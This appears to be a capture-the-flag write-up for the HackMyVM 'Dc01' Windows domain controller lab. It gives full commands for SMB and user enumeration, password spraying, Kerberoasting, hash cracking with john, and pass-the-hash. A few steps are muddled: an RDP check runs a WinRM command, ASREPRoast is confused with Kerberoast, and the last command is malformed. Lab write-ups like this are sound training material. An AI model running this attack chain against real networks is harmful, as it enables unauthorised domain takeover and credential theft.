Dc01November 17, 2024 Created by Page Difficulty OS josemlwdf HackMyVm Easy Windows I start with a scan of the open ports nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.4 -oG scan I continue with a scan of the versions and technologies that are running on the open ports that we have found nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49671,49686 -sCV -Pn 10.0.2.4 -oN ports I list the resources shared by smb smbmap -H 10.0.2.4 -u 'guest' Seeing that I have read permissions on IPC$ I can list system users. When I have a list of potential users I run it through crackmapexec to validate them impacket-lookupsid SOUPEDECODE@10.0.2.4 -no-pass crackmapexec smb 10.0.2.4 -u users -p "" --shares --continue-on-success I am trying to remove users that use the same password as your own user, I find user ybob317 netexec smb 10.0.2.4 -u users_potencial -p users_potencial --no-bruteforce --continue-on-success | grep -v "[-]" I list with the found credentials the smb resources, I can list new folders and inside them I find the first flag smbmap -H 10.0.2.4 -u 'ybob317' -p 'ybob317' I check if this user has permissions to connect via RDP crackmapexec winrm 10.0.2.4 -u "ybob317" -p "ybob317" I try to get user hashes through an ASREPRoast, without providing credentials I get nothing but using ybob317’s credential I manage to dumpe several hashes I notice that I get an error due to a time difference between the machine and my computer, I adjust it with ntpdate ntpdate 10.0.2.4 impacket-GetUserSPNs -request -dc-ip 10.0.2.4 SOUPEDECODE.LOCAL/ybob317:ybob317 -outputfile hashes.kerberoast john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast With these new credentials I can view the contents of a new folder and I get a file containing hashes of several users I check if the hashes found belong to any user and I can do pass-the-hash (PtH). I find a user with whom I can do this attack and when I put Pwn3d! it tells me that I can connect to the machine When I log in I see that I have enough permissions to read the second flag netexec smb 10.0.2.4 -u a -p hahses --continue-on-success